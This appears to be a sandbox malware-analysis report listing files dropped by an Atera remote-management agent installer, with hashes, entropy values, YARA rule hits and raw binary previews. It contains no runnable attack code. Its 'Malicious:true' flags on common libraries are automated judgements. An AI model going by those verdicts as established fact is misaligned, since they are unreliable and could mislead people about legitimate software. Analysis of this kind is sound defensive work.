                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.R..........." ..0..............3... ...@....... ...............................5....`..................................2..O....@............... ..0(...`.......1..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................2......H.......H....1..................81.......................................0..S........-.r...ps!...zs".....o#.....g...%.. .o$......+......(%...,...o&.....X....i2..o'...*..0...........-.r...ps!...zs".....s(.....~o...%-.&~n.........s)...%.o...(...+o+....+X.o,.....(-...-.r...pr...ps....z..o/...&.o0....3(.o1... ....(2.....(3...,....o&.....o4....o5...-....,..o6.....o0...,.rK..pr...ps....z.o'...*.......F.d.......z.-.r...ps!...z.(7....-. o8...*..0..U........-.r...ps!...zs9........+ ..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27184
                                                                                                                                                                                                                                        Entropy (8bit):6.334370226233819
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Bn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCw:BnvXYcIh6yFIFBYpc47Hxn
                                                                                                                                                                                                                                        MD5:A964D6B5F323E343E884A1E4EBBA21A3
                                                                                                                                                                                                                                        SHA1:41FEA32C2FCC56070CF904AB441019F963C83ED5
                                                                                                                                                                                                                                        SHA-256:0214D2C78CC1DBE92853305FA12119BBE09EA06B5EB9C4B4E7AD76B6FAF232ED
                                                                                                                                                                                                                                        SHA-512:3E93C094D3B9D77BAE9C1725B452743FDFA0A20EB07FFC50EA861C501821710A2C29197CF43DCEC1BF089A5BC9B8F2BF57F9FD0EC8D9805D00E32538D03CD46C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B..0(..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.955083228632948
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:R784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRX:R7N1r9KGI04CCARLX
                                                                                                                                                                                                                                        MD5:FA432B69828C0F175E44B367AF91ED2D
                                                                                                                                                                                                                                        SHA1:C0E72D5C64E9B560311EBD1EC3A35CED46386C78
                                                                                                                                                                                                                                        SHA-256:6718AFA55EF89805B69360C9E88347A39CC302AB3C16590E78136C20DB025613
                                                                                                                                                                                                                                        SHA-512:E0C54D9126C557C24013486A31D5477EFF2B800ADAE472C3103EE1F1CD527546E6DCEFB19D5DCE602AEE6DA7A0290F413CE2C6C09DF28D4333C4E62510FE2064
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`............@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):639
                                                                                                                                                                                                                                        Entropy (8bit):4.873801540154673
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q+eIytXE6+eIy6XEOMrDz+s4ECuZDk+LrqrQgQPc+z+Ut9r6QPc+UD+Ufrur6QP/:Q9tXl9W0z4EigrKQXc0V1cZQ1cZXXcZ
                                                                                                                                                                                                                                        MD5:48713F39E22ABB3B520C68DD2D3B22B2
                                                                                                                                                                                                                                        SHA1:0603F18765DF10A4642F4E4EDB82153B5016AB19
                                                                                                                                                                                                                                        SHA-256:AE1362C09B243B1DC1E5A32F429606565C857979DFBA57E628B36D635FB4C09B
                                                                                                                                                                                                                                        SHA-512:CC5225FCDA1F6FAF46FA5EF32CBBA99B284CEE68099FB09EA67B57D6A8F18F365F27F9F36675E811D1783258A58E816A64A0375A089BDFE5E34809DAD6E832BC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:17/12/2024 12:46:39 In Program static constructor, before instantiating _logger17/12/2024 12:46:39 In Program static constructor, after instantiating _logger without using _logger17/12/2024 12:46:39 Starting Main(), logging without using _logger..17/12/2024 12:46:39.801 pm: Info: Before PollAll() call written at: 17/12/2024 12:46:39..17/12/2024 12:46:43.505 pm: Info: In PollAll() before Poller.PollAll(false) written at: 17/12/2024 12:46:43..17/12/2024 12:46:43.536 pm: Info: In PollAll() after Poller.PollAll(false) written at: 17/12/2024 12:46:43..17/12/2024 12:46:43.536 pm: Info: After PollAll() call written at: 17/12/2024 12:46:43

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):769512
                                                                                                                                                                                                                                        Entropy (8bit):7.999707809987997
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:+VnOw8pDA4/vQeibNTlTWMqjPdSfZauT1T0OH5/uHyG3SV:Ony3ipTOpSfZauTZ0OH58yGw
                                                                                                                                                                                                                                        MD5:0A7BA12DD27CC0378BCB71DB4232A997
                                                                                                                                                                                                                                        SHA1:CBDF5E92588F4A8E96E1102621E028289E112579
                                                                                                                                                                                                                                        SHA-256:111D77EB23C362ADF258FECA654C8A0990696122EC2CF62F63ADEF047D837BB7
                                                                                                                                                                                                                                        SHA-512:4030443A134D8BFC21CE7A0A02FC8EACBC4C44654D1BCB20884AE8793E49640D7C3BCE4D8C92E58818359A21FD95D078093BD6F85678CE7E518EA3F8D1611B92
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....=O(Y..>.........3...AgentPackageMarketplace/AgentPackageMarketplace.exe....0.......>N......V.^.'....l....f.u*-Dl._.>.u.S.Pl-6.;...].#.S.X..7./...."...Z.....M.$`.,..{....v...B.Q.M7.j4.'.C.G`<s.X.%.....,...<bdR....N....!.$J@.k...55....>1..(P&..-.#p.NwuV=Wb...a....-....q.!.s.LH..(...:..#7...L.7.$6.C.uy....&I.r..e...,w0o.....`.....[.{cg=]..IBiQq.`.X.D.h.......G./..NA.....46....w.....b9rp.J.C*.2.F.....G...~..q.x....u......l..I..b..z..w..v.d!./..U.Y^..J..k<kUo:.n:.W......g$..<.X.>....rQ.5JiJ.+..|.p......C......o/...K......T.....+9..z.."..Yd.f..&.B..QWu.-.@...c4.T.^...#.E...v...B..\.x0..{..."|.a.?.y.......-..W.........8nk.).$sf.2].c>...`....=...0..$.bp...Oh....8x.-.%N/...w.........i....a.QX0.k..k..f..D.vl.f.Q..3....]....$.4..k..y.../...'...a..C.x...@..".8....9...;..&j..G#f......).....l......Y..7.c....PJ...X...^)s[...{.......Jr.Q..+....N.F.I...%OS...=.......5......i....h..(....r..T-ir.=.+.'..'.......r...[..J...l.P....[.q...,.To..h.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3585766
                                                                                                                                                                                                                                        Entropy (8bit):7.9999279847863685
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:98304:XOzuWD7XM4OvRQW56YWuCrMXa7ANNBvlXWKCI:XauWD7cjGKWuyOr
                                                                                                                                                                                                                                        MD5:E010D1F614B1A830482D3DF4BA056F24
                                                                                                                                                                                                                                        SHA1:5873E22B8C51A808C06A3BBF425FCF02B2A80328
                                                                                                                                                                                                                                        SHA-256:98A98DD1DF25D31A01D47EAF4FA65D5F88BC0AD166F8F31D68F2994B4F739A9B
                                                                                                                                                                                                                                        SHA-512:727877929530E08062611868FD751D1B64E4C7D28C26B70F14C7CD942B1AE1579CBA2A2EF038BAD07032EF728AE277963FFB3E1AB7A5C28351326FABAD84DAA6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-......6>Y.^.S........1...AgentPackageMonitoring/AgentPackageMonitoring.exe....0........p........_L........v.w.../.E..l1.=.8..F.....|..%J.....QB..+.C#.(...Y..*FC.j./.?..#WJ.T......3.P....7^p5.g.`.. .m.h..U..(\.OlC.U...,...l~..Noh.q....Ai.'.EuZ..!z..5w4..&..4..b.__...7u..^.Wv.1.:.|....}..I....F..W..Ko]_j.mk..v..-....CW.....%x....&...o.:I.~.C..#%S..U...f$..n.........WE.....>...d...._M.|....(..?..i. Z.d......{..C.P....57.QR...._iN...r.t..IG..tFs..r.%..b.I.C......`Dd..8U.h..T.C..q....7.i.L..S!m"..).s."..H....W..b....X.l.C..'..#M....gB}k4..{K.&..s.<.^..Q....Q..c..&..BO..W.".\...!.CR..,o<.X>....,.-.[.^1H^r.)q. L..#.?...0..j.,r.`#..Rq"K/.B.:.....V...hX_..ja.........[.)&....C...../../......IZ2..v .@G...*F....nf. .@w.9o.,.....X.i.K/.}\!..7.a.w....:.x.$gE..DG..V...t...K...M.$...b..{.u.4..1..]."..o.n8dQ<...q.....d.(..Y...U...../n.....*y+..%.+.D.}W.&&.U.Z...c#.mU(.......d(.......x....r".g/O.....5..|(p..XG...'7].3.A.Y.&.&D$.".|...D..d\.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398384
                                                                                                                                                                                                                                        Entropy (8bit):6.2554691460003795
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:OLrnDNjiDx+xdShTv/51LtpYbgPuXhN2sHY:OLcDx+72/51+cuXhN2Z
                                                                                                                                                                                                                                        MD5:5E3252E0248B484E76FCDBF8B42A645D
                                                                                                                                                                                                                                        SHA1:11AE92FD16AC87F6AB755911E85E263253C16516
                                                                                                                                                                                                                                        SHA-256:01F464FBB9B0BFD0E16D4AD6C5DE80F7AAD0F126E084D7F41FEF36BE6EC2FC8E
                                                                                                                                                                                                                                        SHA-512:540D6B3CA9C01E3E09673601514AF701A41E7D024070DE1257249C3C077AC53852BD04AB4AC928A38C9C84F423A6A3A89AB0676501A9EDC28F95DE83818FB699
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../............"...0.............2.... ........@.. .......................@......<.....`.....................................O.......(...............0(... ......0...8............................................ ............... ..H............text........ ...................... ..`.rsrc...(...........................@..@.reloc....... ......................@..B........................H........0..d.............................................................{'...*..{(...*..{)...*r.(*.....}'.....}(.....})...*....0..Y........u........L.,G(+....{'....{'...o,...,/(-....{(....{(...o....,.(/....{)....{)...o0...*.*.*....0..K....... bHQ. )UU.Z(+....{'...o1...X )UU.Z(-....{(...o2...X )UU.Z(/....{)...o3...X*..0...........r...p......%..{'......%q.........-.&.+.......o4....%..{(......%q.........-.&.+.......o4....%..{)......%q.........-.&.+.......o4....(5...*..{6...*:.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1459
                                                                                                                                                                                                                                        Entropy (8bit):5.033662307409642
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dErdGPF7Nv+13vH2/nVhOXrRH2/d9XF7N0PH2/+w39XF7NQ7uH2/F9y:cErU7h+1/gn27Rgdz7Eg+w3z76agFw
                                                                                                                                                                                                                                        MD5:C6ECF24757926EBA64E674BFF8B747D1
                                                                                                                                                                                                                                        SHA1:3A46083826C20E8E085C42BBFDFEEF4F9E2B90D9
                                                                                                                                                                                                                                        SHA-256:C3EC04142C15B0A237E72CE1C3C85D19CD1231B9824F7A9854E7909A74B7BECC
                                                                                                                                                                                                                                        SHA-512:EFABB9883ADB098A90115E8938C92B76BBB8D2EB5DE170ECFA205EE949A2D722E0F97F6E01F9A71AC8B5FA2108B9FF82FA0171759D50E30D0AB5FC1948BDCE15
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhWQn:WZn
                                                                                                                                                                                                                                        MD5:5796D1F96BB31A9D07F4DB8AE9F0DDB3
                                                                                                                                                                                                                                        SHA1:93012724E6CC0A298838AEDE678806E6C0C6517D
                                                                                                                                                                                                                                        SHA-256:A90D255CCE3B419641FA0B9BA74D4DA464E0CE70638A9C2EBA03D6B34FCA1DC4
                                                                                                                                                                                                                                        SHA-512:890112DDCB3B92B739C0DD06721EFA81926CE3AAB04C55CDADB8C4E6B7A28C9796F08F508249DB189547DC4755804AA80CC8B104DD65C813A0450AAD2CDDA21C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=37.8

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102448
                                                                                                                                                                                                                                        Entropy (8bit):6.190879178656762
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:gPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87Hxm:g2bYbYSWd85I5sSakFQhHL8g
                                                                                                                                                                                                                                        MD5:A86884A9A1C75604B2114E09B738FCF9
                                                                                                                                                                                                                                        SHA1:A82B444BF09CFCAE36F532C4EB4B8C5EF0933F6A
                                                                                                                                                                                                                                        SHA-256:EEF751E3B01C4071A1BA34E96B663E93631C51485AF31055C3EB2F75866F9FEC
                                                                                                                                                                                                                                        SHA-512:4B97A3D4C37129440816D0524CDB1C485AE68B6C6735857C157D7EA76ADD91241B7185C831C646713CFB4DFB3EC95E577F98088D08ACBB0313837CA584474299
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ....................................`.................................`}..O.......8............h..0(..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):5.997149012234495
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:S4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkj87Hxsfn:S4auS7S5Ea6WMcpu8Mn
                                                                                                                                                                                                                                        MD5:0E5155ECBE5A1797644F1610DAA15583
                                                                                                                                                                                                                                        SHA1:89677E0F9443D52C73D4E0B91C5AEE5215EC4E88
                                                                                                                                                                                                                                        SHA-256:9BAF23C814DD100B2AC9511C9A2E5302DEE1FFB1807DEA021E1D317BA36901CA
                                                                                                                                                                                                                                        SHA-512:3F80A871547BDF47F0A5B58F54B9597D0894580FCEE8F53DD08C8A80658697FA9C9426AB8D47A40B0CDCF53D11769C654D26A3B530AD39A3A6E37D468CA309D3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=$..........." ..0..B..........b`... ........... ..............................d.....`..................................`..O.......4............L..0(..........h_..8............................................ ............... ..H............text...h@... ...B.................. ..`.rsrc...4............D..............@..@.reloc...............J..............@..B................A`......H.......Lh................................................................(......}......}.......}.......}........o<...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po ...o....*..{....o/...r...p.(....(....o%...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75312
                                                                                                                                                                                                                                        Entropy (8bit):6.240342116807372
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:bu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYM:iF+qo7mDEwj4NXLGcfgruFcg7HxRM7
                                                                                                                                                                                                                                        MD5:F64746D633211D129AEC5DB988BCC9B1
                                                                                                                                                                                                                                        SHA1:78E7047265B0DF15C54FE84261D2A0B3568FEF31
                                                                                                                                                                                                                                        SHA-256:9EC285FDB857D5618FBD794464135BC56823B08146EA41F24FCEC3135F0E1C0B
                                                                                                                                                                                                                                        SHA-512:31BCE8F3DC415F562354044BA490A9252E6C20CAA38D5162AB3929111566BCA7E97D609EACAC4712E814AA8AACFCB7B32360E4F6EE5521D6223DCC4617A5614F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`............`.....................................O.... ..................0(...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.408313907878965
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:RQMnMYPWMXMwtKsSdj3xn91SPSvwzE8Kku6P3A+wf+bMEpYinAMxCk15:R9MYPJS/16/E8/3A+++bF7Hx315
                                                                                                                                                                                                                                        MD5:1CAB625AAF9CBCAB46B1455BCA45EF4C
                                                                                                                                                                                                                                        SHA1:274A3B9134AA4530110F29C1858A85D86D4A396D
                                                                                                                                                                                                                                        SHA-256:1CB4C57049F47E3EEFB1C2BAB2BA34A17ABDA610DC3D4D331A9B33B40B00307F
                                                                                                                                                                                                                                        SHA-512:BF4A53BFB9DCF13C87ED6E79640371908C73E7D67765B724C509B4EB7F3F66962F0883094640497CCD2FFCD255D1E46A50B33850E8B0B2D1CC684D40DE24F5D7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D............." ..0.............b.... ........... ....................................`.....................................O.......4...............0(..........$...T............................................ ............... ..H............text...h.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................B.......H.......|E...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155184
                                                                                                                                                                                                                                        Entropy (8bit):6.247374284901675
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:A0feG0EI+t80zE04kjSnY2QJ6lwZaBsEFmWF+YkY:1P80zukOltwW9
                                                                                                                                                                                                                                        MD5:12572F87CCF0E40406B3554A1A6D3905
                                                                                                                                                                                                                                        SHA1:C9E238EF065D38400D084265EE056B2ABB694224
                                                                                                                                                                                                                                        SHA-256:6FDB589EBADF91A869EAA3A850B0FB17A8AB96BED78422E28F7EFAF63BC040F9
